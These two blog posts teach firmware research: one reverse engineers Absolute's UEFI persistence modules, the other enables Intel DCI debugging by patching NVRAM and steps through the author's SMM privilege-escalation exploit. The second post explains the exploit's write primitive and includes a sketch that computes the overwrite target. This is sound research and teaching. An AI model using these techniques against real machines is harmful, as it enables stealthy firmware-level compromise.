Monday, April 12, 2021

Reverse engineering (Absolute) UEFI modules for beginners

This post introduces how to start reverse engineering UEFI-based BIOS modules. Using Absolute as an example, it serves as a tutorial on BIOS module reverse engineering with free tools and approachable steps for beginners.

This post does not explain how to disable Absolute or how to discover issues in it.

In this post, the terms "BIOS", "UEFI", and "firmware" all refer to UEFI-based host firmware and are used interchangeably.

Background Story

You can skip this section. 

Last week, I got a Dell laptop with Absolute activated.

Absolute, formerly known as Computrace, is popular data and device security software with an interesting persistence technology, as explained on Wikipedia:

Absolute's flagship product is the Absolute Platform, formerly known as Data and Device Security (DDS). Absolute relies on patented Persistence technology, which is embedded into the firmware of most computers, tablets, and smartphones at the factory.[25]

The Persistence module is activated once the Absolute agent is installed. If the software client is removed from a device through flashing the firmware, replacing the hard drive, reimaging the device, or resetting the device back to factory settings, Persistence technology will trigger an automatic reinstallation of the software client.[25] Persistence technology is embedded in more than half a billion devices worldwide.

I had read multiple articles about its internals in the past but did not know much about the modules embedded in the firmware. Out of curiosity, I started to reverse engineer them, and then decided to write up the steps I took because I believe this area deserves more scrutiny from engineers, and more tutorials.

Getting a BIOS image

There are two easy ways to get a BIOS image to analyze: extracting from an update package or using CHIPSEC.

BIOS images may be extracted from the BIOS update packages that OEMs publish. For example, the images in any recent Dell BIOS update can be extracted with a script found in @platomaniac's BIOSUtilities repo.

As a handy sample, here is the Dell BIOS image we will analyze in this post.

Alternatively, once CHIPSEC is installed, one can dump the BIOS image of the current system with this command, if the system is supported:

$ python chipsec_util.py spi dump rom.bin
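Before digging in, it can help to sanity-check the dump. The following Python sketch (not part of CHIPSEC; the function name is my own) scans a file for the "_FVH" signature, which sits at offset 0x28 of every EFI_FIRMWARE_VOLUME_HEADER, and reports each volume's start offset and declared FvLength. It assumes an uncompressed SPI image such as rom.bin. Update packages or capsule-wrapped files need unpacking first.

```python
import struct

FVH_SIGNATURE = b"_FVH"
SIGNATURE_OFFSET = 0x28  # offset of Signature in EFI_FIRMWARE_VOLUME_HEADER
FV_LENGTH_OFFSET = 0x20  # offset of FvLength (UINT64)


def find_firmware_volumes(image: bytes):
    """Return (start_offset, fv_length) for each plausible firmware volume."""
    volumes = []
    pos = image.find(FVH_SIGNATURE)
    while pos != -1:
        start = pos - SIGNATURE_OFFSET
        if start >= 0:
            (fv_length,) = struct.unpack_from("<Q", image, start + FV_LENGTH_OFFSET)
            # Discard hits whose declared length runs past the end of the dump
            if 0 < fv_length <= len(image) - start:
                volumes.append((start, fv_length))
        pos = image.find(FVH_SIGNATURE, pos + 1)
    return volumes
```

For example, find_firmware_volumes(open("rom.bin", "rb").read()) should roughly match the volumes UEFITool displays, except for volumes nested inside compressed sections.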

Identifying Absolute's module

UEFI modules are normally OS-agnostic. This is not the case, however, for modules that need to interact with the OS environment, for example, to establish OS-level persistence. We can find such peculiar modules by searching for OS-specific strings such as "System32" and "NtOpen." Let us do this.
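UEFITool's text search does this interactively. If you want to script the same check over many extracted files, a minimal Python sketch follows. It looks for each keyword both as ASCII and as UTF-16LE, since UEFI code commonly stores strings as CHAR16. The function name and default keywords are illustrative.

```python
def find_os_strings(blob: bytes, needles=("System32", "NtOpen")):
    """Return {needle: sorted offsets} for ASCII and UTF-16LE occurrences."""
    hits = {}
    for needle in needles:
        offsets = []
        for encoded in (needle.encode("ascii"), needle.encode("utf-16-le")):
            pos = blob.find(encoded)
            while pos != -1:
                offsets.append(pos)
                pos = blob.find(encoded, pos + 1)
        hits[needle] = sorted(offsets)
    return hits
```

A non-empty list for either keyword marks a module worth opening in a disassembler.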

Open the extracted image with UEFITool and search for "System32". This will list 821ACA26-29EA-4993-839F-597FC021708D.

Note that UEFI modules are identified by GUIDs, not human-friendly names. Names may be specified but are optional and unused by the platform software. For example, 821ACA26-29EA-4993-839F-597FC021708D is unnamed in our image, but in another image it is named "efiinstnats". The internet also suggests it may be named "AbsoluteAbtInstaller".

Reverse Engineering a UEFI module

As UEFITool shows, UEFI modules are mostly in the PE format and can be analyzed with existing tools.

To reverse engineer 821ACA26-29EA-4993-839F-597FC021708D, right-click the file in UEFITool and extract its body. Then, install Ghidra and the efiSeek plugin as a free option. The other popular option is IDA with efiXplorer, though the free version of IDA is not usable for our scenario.

Open the extracted file (821ACA26-29EA-4993-839F-597FC021708D) with Ghidra and make sure efiSeek is checked for auto analysis. Ignore a warning about PDB if it appears.


The strings contained in the module are VERY interesting.

What on earth does a UEFI module have to do with SystemRoot? Either way, the string “Computrace” indicates this is Absolute’s component.

By peeking at functions called from the entry point, we can find an interesting function calling InstallAcpiTable().

As the API name suggests, it installs… an ACPI table, but which one? With a little bit of clean-up, we can see that some values resembling string literals are assigned to the table variable; in particular, "WPBT" at offset 0 looks interesting.

A quick web search turns up Microsoft's document explaining the table: Windows Platform Binary Table (WPBT) (DOCX).

In short, this type of ACPI table lets a UEFI module instruct Windows’ Session Manager to launch a specified executable on startup. We can see the use of the table in the code.
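To make the table's contents concrete, here is a Python sketch that decodes a raw WPBT table, for example one dumped from a running system. The field layout is my reading of Microsoft's WPBT document: the 36-byte ACPI header, then a 4-byte handoff memory size, an 8-byte handoff memory location, 1-byte content layout and content type fields, and a 2-byte command-line length followed by the arguments. Treating the arguments as UTF-16LE is an assumption. Verify both against the document before relying on them.

```python
import struct

ACPI_HEADER_FMT = "<4sIBB6s8sIII"  # standard 36-byte ACPI table header
WPBT_FIELDS_FMT = "<IQBBH"         # WPBT fields following the header (assumed layout)


def parse_wpbt(table: bytes) -> dict:
    """Decode a raw WPBT table into a dict of its main fields."""
    header_size = struct.calcsize(ACPI_HEADER_FMT)  # 36
    signature, length, _rev, _csum, oem_id, *_rest = struct.unpack_from(ACPI_HEADER_FMT, table)
    if signature != b"WPBT":
        raise ValueError("not a WPBT table")
    # An ACPI table is valid when all of its bytes sum to zero (mod 256)
    if sum(table[:length]) % 256 != 0:
        raise ValueError("bad ACPI checksum")
    handoff_size, handoff_addr, layout, content_type, args_len = struct.unpack_from(
        WPBT_FIELDS_FMT, table, header_size)
    args_start = header_size + struct.calcsize(WPBT_FIELDS_FMT)  # 52
    args = table[args_start:args_start + args_len]
    return {
        "length": length,
        "oem_id": oem_id.rstrip(b"\0 ").decode("ascii", "replace"),
        "handoff_memory_size": handoff_size,      # size of the embedded PE image
        "handoff_memory_location": handoff_addr,  # physical address of the image
        "content_layout": layout,                 # 1 = single PE image
        "content_type": content_type,             # 1 = native user-mode application
        "command_line": args.decode("utf-16-le").rstrip("\0"),  # assumed UTF-16LE
    }
```

The handoff memory location is the physical address where the firmware placed the executable, which is what the next step follows back into the module.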

Let us verify what is being registered. The handoff memory appears to be initialized with the data at 0x80013178, which comes from 0x80001138, where the MZ header is located.
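If you want that embedded executable as a standalone file, a rough carving approach is to look for a second MZ header inside the extracted module and size the image from its section table. The Python sketch below does that. The search starts at offset 1 because the module itself is a PE file with MZ at offset 0. The size heuristic (end of the furthest section's raw data) is my assumption and ignores overlays such as appended certificates.

```python
import struct


def carve_embedded_pe(blob: bytes, start: int = 1) -> bytes:
    """Return the first well-formed PE image found at or after `start`."""
    pos = blob.find(b"MZ", start)
    while pos != -1:
        if pos + 0x40 <= len(blob):
            (e_lfanew,) = struct.unpack_from("<I", blob, pos + 0x3C)
            nt = pos + e_lfanew
            if blob[nt:nt + 4] == b"PE\0\0":
                (num_sections,) = struct.unpack_from("<H", blob, nt + 6)  # COFF NumberOfSections
                (opt_size,) = struct.unpack_from("<H", blob, nt + 20)     # SizeOfOptionalHeader
                sections = nt + 24 + opt_size  # section table follows the optional header
                end = 0
                for i in range(num_sections):
                    # SizeOfRawData and PointerToRawData live at +16 and +20 of each 40-byte header
                    raw_size, raw_ptr = struct.unpack_from("<II", blob, sections + 40 * i + 16)
                    end = max(end, raw_ptr + raw_size)
                return blob[pos:pos + end]
        pos = blob.find(b"MZ", pos + 1)
    raise ValueError("no embedded PE image found")
```

The result can then be loaded into Ghidra like any other PE file for a look at what Windows will run.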

 

From here, you could investigate smss.exe to see how the program is executed, and wpbbin.exe to see what the program does. In this post, however, we are going to look further into the BIOS.

Tracking inter-module dependencies

We have understood how the module installs an auto-start mechanism for Windows, but how does 821ACA26-29EA-4993-839F-597FC021708D itself get executed? The file is an “Application”, which is not automatically loaded by the platform software.

The short answer: another module starts it. 

Finding the parent module requires the UEFI-specific knowledge that an application in the firmware image is started with these steps:

  1. Building a device path to the application file from its GUID, based on the firmware volume found through EFI_LOADED_IMAGE_PROTOCOL
  2. Calling LoadImage() and StartImage()

EDK2's UEFI Driver Writer's Guide shows example code that looks about like this:

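EFI_LOADED_IMAGE_PROTOCOL          *loadedImage;
EFI_DEVICE_PATH_PROTOCOL           *fvPath;
EFI_DEVICE_PATH_PROTOCOL           *path;
MEDIA_FW_VOL_FILEPATH_DEVICE_PATH  fileNode;
EFI_HANDLE                         newImageHandle;
// Find the firmware volume this driver was loaded from (error handling omitted)
gBS->HandleProtocol(ImageHandle, &gEfiLoadedImageProtocolGuid, (VOID **)&loadedImage);
gBS->HandleProtocol(loadedImage->DeviceHandle, &gEfiDevicePathProtocolGuid, (VOID **)&fvPath);
// Build the file node: sets Header and FvFileName (GUID of the file to launch)
EfiInitializeFwVolDevicepathNode(&fileNode, FileGuid);
// Resolve the path in the firmware volume
path = AppendDevicePathNode(fvPath, (EFI_DEVICE_PATH_PROTOCOL *)&fileNode);
// Load and start the file
gBS->LoadImage(FALSE, ImageHandle, path, NULL, 0, &newImageHandle);
gBS->StartImage(newImageHandle, NULL, NULL);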

With this knowledge, we can search the GUID of the application (821ACA26-29EA-4993-839F-597FC021708D) and locate the parent module. 
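When searching raw bytes rather than using UEFITool's GUID search, note that an EFI_GUID is not stored in the order it is written. Data1, Data2, and Data3 are little-endian, and Data4 is kept as-is. Python's uuid.UUID.bytes_le produces exactly that layout, so a small sketch can generate the byte pattern and a hex string suitable for pasting into Ghidra's memory search. The helper names are my own.

```python
import uuid


def guid_search_pattern(guid: str) -> bytes:
    """Return the in-memory EFI_GUID byte layout for a registry-format GUID."""
    # EFI_GUID keeps Data1..Data3 little-endian and Data4 as raw bytes,
    # which matches uuid.UUID.bytes_le.
    return uuid.UUID(guid).bytes_le


def ghidra_hex_string(guid: str) -> str:
    """Space-separated hex, as accepted by a hex memory search."""
    return " ".join(f"{b:02x}" for b in guid_search_pattern(guid))


def find_guid(blob: bytes, guid: str):
    """Return every offset where the GUID's byte pattern occurs in blob."""
    pattern = guid_search_pattern(guid)
    offsets, pos = [], blob.find(pattern)
    while pos != -1:
        offsets.append(pos)
        pos = blob.find(pattern, pos + 1)
    return offsets
```

For 821ACA26-29EA-4993-839F-597FC021708D, the pattern is 26 ca 1a 82 ea 29 93 49 83 9f 59 7f c0 21 70 8d.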

As shown above, the module 8B778A74-C275-49D5-93ED-4D709A129CB1 is found, and it is a DXE driver, meaning it is executed automatically by the platform software. Note that this module does not have a name in our image, but other images name it AbtDxe or DellAbtDxeBin.

Open this module with Ghidra and search for the GUID with memory search. We can find the GUID at 0x800050e0 as shown below.


By cross-referencing 0x800050e0, we can find the function using the GUID and calling StartImage().

Inspecting FUN_80002fe8, called above, makes it obvious that the function calls LoadImage() with the GUID as input and then calls StartImage(), which launches the application.

When are these functions called? By cross-referencing the function, we can find that a pointer to it is passed to CreateEventEx() along with EFI_EVENT_READY_TO_BOOT_GUID.


We can make better sense of this with the UEFI specification (PDF).

As highlighted, the function is registered as a callback for the event that is signaled right before the OS boot loader starts.

To summarize the flow:

  1. The driver 8B778A74-C275-49D5-93ED-4D709A129CB1 is loaded by the platform software.
  2. The driver 8B778A74-C275-49D5-93ED-4D709A129CB1 registers the event notification.
  3. When the system is about to start the boot loader (e.g., bootmgfw.efi or grub.efi), the event is signaled.
  4. The driver 8B778A74-C275-49D5-93ED-4D709A129CB1 starts the application 821ACA26-29EA-4993-839F-597FC021708D.
  5. The application 821ACA26-29EA-4993-839F-597FC021708D installs the WPBT ACPI table.
  6. If Windows is booted, smss.exe creates wpbbin.exe from the table and executes it.
This establishes the mechanism to auto start a Windows application, even if Windows is reinstalled.

More inter-module interactions

An astute reader might notice that we have not looked into how the above flow is activated, or skipped when Absolute is not enabled by the user. Answering this question requires further analysis of UEFI variables and additional OEM-specific modules.

On the UEFI variables: Absolute uses a few variables named Abt* in the a0b1889e-00eb-445b-8ca9-e91ce43c907d namespace. They can easily be found as Unicode strings.
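Variable names are CHAR16 strings, so a UTF-16LE "strings" pass over a module lists them quickly. The Python sketch below yields every run of at least four printable UTF-16LE characters, optionally filtered by a prefix such as "Abt". The minimum length and the helper name are arbitrary choices for illustration.

```python
import re

# Printable ASCII characters encoded as UTF-16LE (each followed by a zero byte)
WIDE_STRING = re.compile(rb"(?:[\x20-\x7e]\x00){4,}")


def wide_strings(blob: bytes, prefix: str = ""):
    """Yield (offset, text) for UTF-16LE strings of 4+ chars starting with prefix."""
    for m in WIDE_STRING.finditer(blob):
        text = m.group().decode("utf-16-le")
        if text.startswith(prefix):
            yield m.start(), text
```

For example, list(wide_strings(module_bytes, "Abt")) would list candidate Abt* variable names together with their offsets, which can then be cross-referenced in Ghidra.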

On the additional modules: the snippet below indicates that the application is launched if either:

  • LocateProtocol() failed, or
  • LocateProtocol() succeeded and the bit 0 of the retrieved data is set  

The first case does not appear to happen. The second case depends on whether another module, which installed the “unknownProtocol_fa02fb02” protocol, sets the bit on its side. This means we would have to reverse engineer that other module to determine the exact condition.

One can find the additional module by searching for the protocol GUID in UEFITool again. These are the modules I found on my laptops:

  • 0FEBE434-A6AF-4166-BC2F-DE2C5952C87D (DellAbsoluteDxe) in Dell laptops
  • A81DD68E-F878-49FF-8309-798444A9C035 (AbtSmm) in an Acer laptop
  • 458034FD-DE82-44F1-8398-6D941F85F473 and 22E6FAB5-A6C4-4FF6-AE8C-C16939911BCD in an HP laptop

Analysis of the UEFI variable and OEM-specific modules is left as an exercise for readers, as they differ across OEMs.  

Conclusion

Through this exercise, we studied:

  • How a BIOS image file can be extracted
  • How modules with a tight dependency on Windows can be located
  • How the WPBT ACPI table may be used to establish persistence on Windows
  • How events can be used for deferred execution
  • How dependent modules may be located in the BIOS image
  • Using only freely available, cross-platform software  

Hopefully, you found reverse engineering BIOS images interesting and more approachable than you previously thought.

Monday, March 29, 2021

Debugging System with DCI and Windbg

This post introduces how one can debug the entire system, including system management mode (SMM) code, with Windbg and Direct Connect Interface (DCI). As an example use case, we will debug an exploit for the kernel-to-SMM local privilege escalation vulnerability I reported.

For more details about the vulnerability and its implications, please refer to the GitHub repository. This post focuses on DCI and Windbg.

Summary

DCI is a stealthy, accessible, and very powerful technology for kernel/firmware debugging and reverse engineering, and Intel Debug Extensions for WinDbg let us use it through Windbg's already-familiar commands and GUI. This can speed up your security research.

What is Direct Connect Interface?

Direct Connect Interface (DCI) is a debugging interface provided by Intel hardware. It allows developers to debug the whole system without depending on a software-provided debugging mechanism, such as Windows' kernel debugging subsystem or the firmware (EDK2) Debug Agent.

As DCI is implemented in hardware, a debugger using this interface can debug a greater range of code, including the reset vector and code that runs in system management mode (SMM). This makes DCI an attractive tool for both developing and reverse engineering firmware, for example.

For a more comprehensive overview of the DCI technology, I strongly recommend taking time to watch the video from Intel and reading a document by the Slim Bootloader team: 

Does my system support DCI?  

DCI is available on Skylake (6th gen) or later and on some Atom and Xeon models. However, older generations support only a connection type called DCI OOB, which requires an expensive adapter, as shown in the table below.

If your target system is 7th gen or newer, DCI DbC is supported, and all you need to buy is a USB cable without VBus. Buy ITPDCIAMAM1M or DataPro's equivalent if the target system has a Type-A USB port, or ITPDCIAMCM1M for a Type-C USB port. I suggest buying both, since I had a device that only worked with the Type-C port.

If your target system is 6th gen, DbC is not supported, and you need to buy an adapter called CCA (EXIBSSBADAPTOR). It is expensive but allows you to debug code even from the reset vector, which DbC does not support.

DCI connection types
(from Debugging Intel Firmware using DCI & USB 3.0 by Intel)

There is no notable requirement for the host system, and one can use a USB-C-to-A adapter if needed.

The complete list of supported models can be found in the release notes of Intel System Debugger, which we will be looking at shortly. 

Is DCI enabled on the target?

If IA32_DEBUG_INTERFACE[0] is set, DCI is enabled. Use a kernel debugger or RWEverything to check this. For obvious reasons, DCI should be disabled by default on systems in the market. If not, report it to the OEM. It is a vulnerability (see CVE-2018-3652). 
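IA32_DEBUG_INTERFACE is MSR 0xC80. In a kernel debugger, `rdmsr c80` prints its value. The Python sketch below decodes the bits I am aware of from the Intel SDM: bit 0 (Enable), bit 30 (Lock), and bit 31 (Debug Occurred). The optional reader uses Linux's msr driver (root and `modprobe msr` required) and is only an alternative to the Windows tools mentioned above.

```python
import os
import struct

IA32_DEBUG_INTERFACE = 0xC80  # MSR index


def decode_debug_interface(value: int) -> dict:
    """Split an IA32_DEBUG_INTERFACE value into its documented flags."""
    return {
        "enabled": bool(value & (1 << 0)),          # bit 0: Enable
        "locked": bool(value & (1 << 30)),          # bit 30: Lock
        "debug_occurred": bool(value & (1 << 31)),  # bit 31: Debug Occurred
    }


def read_msr_linux(msr: int, cpu: int = 0) -> int:
    """Read an MSR through /dev/cpu/N/msr (Linux only, requires root)."""
    fd = os.open(f"/dev/cpu/{cpu}/msr", os.O_RDONLY)
    try:
        return struct.unpack("<Q", os.pread(fd, 8, msr))[0]
    finally:
        os.close(fd)
```

A production system should report enabled=False. If locked is also True, the setting is expected to stay fixed until reset, which is why the BIOS-level changes below are needed.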

How can I enable DCI? 

There are a couple of ways to do this: changing BIOS settings or patching NVRAM with RU.efi.

BIOS settings 

Very occasionally, BIOS settings offer an option to enable DCI. I have seen a couple of configuration names for this purpose as listed below. Enable them if available. 

  • CPU Run Control
  • Enable HDCIEN
I had a case where the configuration was available but had no effect on IA32_DEBUG_INTERFACE. 

Patching NVRAM with RU.efi

The BIOS settings for DCI are often hidden on production systems, but one can achieve the same effect as changing them by overwriting the NVRAM that stores the setting values. This is a somewhat involved process but is explained in multiple articles, as listed below. Here are the highlights of the steps.

  1. Dump the BIOS using software like CHIPSEC
  2. Extract the module 899407D7-99FE-43D8-9A21-79EC328CAC21 ("Setup") with UEFITool
  3. Extract a human-readable representation of the BIOS menu implementation with IFR Extractor
  4. Find offsets of the following setting names and the value to set, as denoted with =>
    • Debug Interface => Enabled (1)
    • Debug Interface Lock => Disabled (0)
    • DCI enable (HDCIEN) => Enabled (1)
    • Platform Debug Consent => Enabled (DCI OOB+[DbC]) (1)
    • CPU Run Control => Enabled (1)
    • CPU Run Control Lock => Disabled (0)
    • PCH Trace Hub Enable Mode => Host Debugger (2)
      (Not all of them may be present; it depends on the BIOS.)
  5. Download RU.efi, boot the system into the UEFI shell, and start RU.efi
  6. Press Alt+=, select "Setup", and change the values at the offsets found. Commit the changes and reboot.
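Step 4 is tedious to do by eye. The Python sketch below pulls the variable offsets of the listed settings out of IFR Extractor output. The line format it matches ("One Of: <name>, VarStoreInfo (VarOffset/VarName): 0x<offset>, ...") is an assumption based on the Universal IFR Extractor output I have seen, and other versions may differ. It also ignores which VarStore a setting belongs to, so check that each hit is in the Setup store before patching.

```python
import re

# Assumed IFR Extractor line shape, e.g.
#   0x2A3C5  One Of: DCI enable (HDCIEN), VarStoreInfo (VarOffset/VarName): 0x8E3, VarStore: 0x1, ...
ONE_OF = re.compile(
    r"One Of: (?P<name>[^,]+), VarStoreInfo \(VarOffset/VarName\): (?P<offset>0x[0-9A-Fa-f]+)"
)

# Setting name -> value to write, taken from the list in step 4
WANTED = {
    "Debug Interface": 1,
    "Debug Interface Lock": 0,
    "DCI enable (HDCIEN)": 1,
    "Platform Debug Consent": 1,
    "CPU Run Control": 1,
    "CPU Run Control Lock": 0,
    "PCH Trace Hub Enable Mode": 2,
}


def find_setting_offsets(ifr_text: str) -> dict:
    """Return {name: (var_offset, value_to_write)} for wanted settings found."""
    found = {}
    for line in ifr_text.splitlines():
        m = ONE_OF.search(line)
        if m:
            name = m.group("name").strip()
            if name in WANTED:
                # Keep the first occurrence if a setting appears in several forms
                found.setdefault(name, (int(m.group("offset"), 16), WANTED[name]))
    return found
```

Each (offset, value) pair corresponds to one edit in RU.efi's view of the "Setup" variable.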

References

Note that some articles instruct you to change the following, but I did not have to do so. I do not think those are relevant.
  • Enable/Disable IED (Intel Enhanced Debug)
  • xDCI Support
Some devices did not have the Setup module, some had it but did not reflect the changes in IA32_DEBUG_INTERFACE, and some did change IA32_DEBUG_INTERFACE but did not let me connect anyway. I gave up on those cases.

For completeness, Intel Flash Image Tool (FIT) is another tool that can patch firmware and enable DCI. While I have not tried it myself, I have heard it recommended by multiple sources.

How can I connect the target via DCI? 

Intel System Debugger needs to be installed in the host for connection. Intel System Debugger comes as part of Intel System Studio (ISS), which can be downloaded from this link.

Select "Get the Full System Studio Package" then download the "Standalone Offline Installer".
 
Beware that Intel has transitioned from ISS to a different product set and rebranded System Debugger as Intel System Bring-up Toolkit, which requires an NDA to download. The above download link is still alive as of this writing but may be shut down in the future.

During installation, make sure to install at least Intel System Debugger. Once ISS is installed, here are some pages you can refer to for connecting to the target via ISS:

I recommend the legacy version for simplicity. It can be launched with:

C:\Program Files (x86)\IntelSWTools\sw_dev_tools\system_debugger_2020\system_debug_legacy\xdb.bat

Tips for diagnosing connection issues

  • Intel System Debugger Target Indicator is helpful for identifying the possible cause. Make use of it.
 
  • Not all ports work. For example, one of my devices could be debugged only via the Type-C port. Try different ports. Sometimes rebooting, or simply yanking and reconnecting the cable, fixes an issue.

Intel Debug Extensions for WinDbg

The installer should have installed the extension that lets you debug the target with Windbg through DCI. To use the extension, the extended debug interface (EXDI) IPC COM server needs to be registered on the host with the following commands: 

----
> cd "C:\Program Files (x86)\IntelSWTools\sw_dev_tools\system_debugger_2020\windbg-ext\iajtagserver\intel64"
> regsvr32 ExdiIpc.dll
----

Then, reboot the host system. 

Start the Intel System Debugger Developer Shell from the Start menu and type "windbg_dci".

Once the connection is successfully established, type "windbg()".

If successful, Windbg should start, show disassembly and register values, and accept most commands, such as .reload.


While the extension handles Windows-specific bits as if it were a standard kernel debugging session, it does not depend on the kernel debugging mechanism, as indicated by some Kd flags. If you are looking for a stealthy kernel debugging tool, DCI is for you.

Debugging the system

Debugging the Windows kernel via DCI works but is pointless unless regular kernel debugging is impossible. Instead, let us debug the SMM vulnerability exploit as an example use of the extension.

The SMM vulnerability and exploit

The vulnerability is that the SMI 0x40 handler allows an arbitrary byte of SMRAM to be overwritten with 0x07. The exploit uses this primitive to overwrite a function pointer in the global variable referred to as SMST to achieve arbitrary code execution in SMM.

The beautiful thing about SMST is that its address is leaked outside SMRAM by design. Ring0 code can search SMM core private data, which has the distinctive 'smmc' signature, from the UEFI runtime code region, then find the leaked pointer in it.

Address of SMST is leaked outside SMRAM

The exploit takes advantage of this and locates the address of the function pointer in SMRAM without depending on BIOS and system versions. For more details of the vulnerability and the exploit, see the GitHub repository.
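The address arithmetic behind this can be sketched in Python. This is not the exploit's code. It assumes you already have a dump of the UEFI runtime code region as bytes plus its base address, and it uses the SMM_CORE_PRIVATE_DATA and EFI_SMM_SYSTEM_TABLE2 offsets that the `dt` commands later in this post show on this x64 system (Smst at +0x30, SmmLocateProtocol at +0xd0). It also assumes the 'smmc' signature is stored as an 8-byte aligned UINT64.

```python
import struct

SMMC_SIGNATURE = b"smmc\0\0\0\0"   # SMM_CORE_PRIVATE_DATA.Signature as a UINT64
SMST_FIELD_OFFSET = 0x30           # SMM_CORE_PRIVATE_DATA.Smst
SMM_LOCATE_PROTOCOL_OFFSET = 0xD0  # EFI_SMM_SYSTEM_TABLE2.SmmLocateProtocol


def locate_smm_locate_protocol(dump: bytes, dump_base: int):
    """Find SMM core private data in a dump and derive the field to overwrite.

    Returns (private_data_address, smst_address, smm_locate_protocol_field_address),
    or None if no candidate is found.
    """
    pos = dump.find(SMMC_SIGNATURE)
    while pos != -1:
        aligned = (dump_base + pos) % 8 == 0
        in_bounds = pos + SMST_FIELD_OFFSET + 8 <= len(dump)
        if aligned and in_bounds:
            # The leaked SMST pointer lives outside SMRAM, so it is readable here
            (smst,) = struct.unpack_from("<Q", dump, pos + SMST_FIELD_OFFSET)
            return dump_base + pos, smst, smst + SMM_LOCATE_PROTOCOL_OFFSET
        pos = dump.find(SMMC_SIGNATURE, pos + 1)
    return None
```

With the values seen later in this post, private data at 0x87f21390 holding Smst = 0x887f9730 yields 0x887f9800 as the SmmLocateProtocol field.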

Debugging SMM and Shellcode with Windbg

When the exploit is executed on a patched system, it debug-prints the SMRAM range and the addresses of the SMM core and SMST, but fails to run the shellcode.

Let us debug the exploit and simulate successful exploitation with the help of Windbg. We will:
  1. load symbols for the "dt" command, then
  2. break on SMM entry,
  3. extract and analyze SMRAM,
  4. set a breakpoint on the SMI 0x40 handler,
  5. debug and modify execution to simulate successful exploitation

First, break into Windbg and set a breakpoint on one of the NT APIs the exploit calls.

----
0: kd> bp nt!ExGetSystemFirmwareTable
0: kd> g
----

Then, rerun the exploit on the target system. Once the target breaks into Windbg, reload the symbols for the exploit.

----
0: kd> .reload demo.sys
...
ModLoad: fffff806`4d860000 fffff806`4d869000 \??\C:\Users\tanda\Desktop\demo.sys
Loading symbols for fffff806`4d860000 demo.sys -> demo.sys

0: kd> dt demo!SMM_CORE_PRIVATE_DATA
   +0x000 Signature : Uint8B
   ...
----

On another windbg_dci session, enable the SMM entry break and resume the system. The system will break into the debugger again.

----
    [SKL_C0_T0] Hardware Breakpoint Execution breakpoint #0001 at [0x10:fffff8064f795b00]
    [SKL_C0_T1] HLT Instruction Break at [0x38:000000000009e1e5]
    [SKL_C1_T0] HLT Instruction Break at [0x38:000000000009e1e5]
    [SKL_C1_T1] HLT Instruction Break at [0x38:000000000009e1e5]
>>> itp.cv.smmentrybreak = 1
>>> go()
CPUs Resuming execution

>>>
    [SKL_C0_T0] Resuming
    [SKL_C0_T1] Resuming
    [SKL_C1_T0] Resuming
    [SKL_C1_T1] Resuming
>>>
    [SKL_C0_T0] SMM entry Break at [0xcb00:0000000000008000]
    [SKL_C0_T1] SMM entry Break at [0xcb80:0000000000008000]
    [SKL_C1_T0] SMM entry Break at [0xcc00:0000000000008000]
    [SKL_C1_T1] SMM entry Break at [0xcc80:0000000000008000]
>>>
----

In the Windbg session, confirm that this is SMI 0x40 by checking that RIP is 0x8000 and AL is 0x40. Then, dump the contents of SMRAM according to the range debug-printed by the previous run.

----
Break instruction exception - code 80000003 (first chance)
cb00:00000000`00008000 bb9180662e      mov     ebx,2E668091h

0: kd> r
rax=0000000000000040 rbx=0000000000000000 rcx=ffff808cca4df080
rdx=00000000000000b2 rsi=ffff808cd5aff000 rdi=ffff808cd746b7d0
rip=0000000000008000 rsp=000000002c127668 rbp=0000000000000000
 r8=0000000000098367  r9=0000000000000004 r10=00000000ffffffff
r11=ffff808cd74f6040 r12=ffffffff80001998 r13=0000000000000002
r14=fffff8064d7f52f8 r15=ffff808cd5aff000
...

0: kd> .writemem C:\temp\smram_88400000_88800000.bin 0`88400000 0`88800000-1
Writing 400000 bytes.........(snip)...
----

Download and run the SMRAM forensic script authored by Dmytro Oleksiuk (aka Cr4sh, @d_olex). This will show the address of the SMI 0x40 handler.

----
$ wget https://raw.githubusercontent.com/tandasat/smram_parse/master/smram_parse.py
$ python3 smram_parse.py smram_88400000_88800000.bin
...
SW SMI HANDLERS:
...
0x88700110: SMI = 0x40, addr = 0x886e5c68, image = 0x886e5000
...

----

In the Windbg session, confirm that the address looks correct. You can also see that the function references memory outside SMRAM, as highlighted in red. Let us run the target up to that point.

----
0: kd> uf 0`886e5c68
00000000`886e5c68 4053             push rbx
00000000`886e5c6a 4883ec20         sub rsp,20h
00000000`886e5c6e 0fb704250e040000 movzx eax,word ptr [40Eh]
00000000`886e5c76 ba67000000       mov edx,67h
00000000`886e5c7b c605be12000001   mov byte ptr [00000000`886e6f40],1
00000000`886e5c82 c1e004           shl eax,4
00000000`886e5c85 0504010000       add eax,104h
00000000`886e5c8a 8b18             mov ebx,dword ptr [rax]

0: kd> g 0`886e5c8a

----

In the below disassembly, you can see that 0x104, outside the SMRAM, is referenced and contains the address to be overwritten minus 2 as colored in red. You can also find that subsequent code overwrites contents of the address as indicated by green. The address to be overwritten is highlighted in yellow.

----
0038:00000000`886e5c8a 8b18        mov ebx,dword ptr [rax] ds:0018:00000000`00000104=887f97fe
0038:00000000`886e5c8c 488bcb      mov rcx,rbx
0038:00000000`886e5c8f e8bc0d0000  call 00000000`886e6a50
...
0038:00000000`886e5c9e c6430207    mov byte ptr [rbx+2],7 ds:0018:00000000`887f9800=8c
0038:00000000`886e5ca2 eb10        jmp 00000000`886e5cb4

----

How does the exploit compute this address? Recall that the exploit was able to find the SMM core private data at 0x87f21390. Let us "dt" the address to confirm that the SMM core private data is indeed present there, as well as the leaked address of SMST highlighted in yellow.

----
0: kd> db 0`87f21390 l10
00000000`87f21390 73 6d 6d 63 00 00 00 00-18 67 4f 84 00 00 00 00 smmc.....gO.....

0: kd> dt demo!SMM_CORE_PRIVATE_DATA 0`87f21390
   +0x000 Signature : 0x636d6d73
   +0x008 SmmIplImageHandle : 0x00000000`844f6718 Void
   +0x010 SmramRangeCount : 3
   +0x018 SmramRanges : 0x00000000`844f2d18 Void
   +0x020 SmmEntryPoint : 0x00000000`887f9d7c Void
   +0x028 SmmEntryPointRegistered : 0x1 ''
   +0x029 InSmm : 0x1 ''
   +0x030 Smst : 0x00000000`887f9730 EFI_SMM_SYSTEM_TABLE2
   +0x038 CommunicationBuffer : (null) 
   +0x040 BufferSize : 0x20
   +0x048 ReturnStatus : 0
   +0x050 PiSmmCoreImageBase : _LARGE_INTEGER 0x1
   +0x058 PiSmmCoreImageSize : 0xfffff806`53427320
   +0x060 PiSmmCoreEntryPoint : _LARGE_INTEGER 0xfffff806`53427980
----

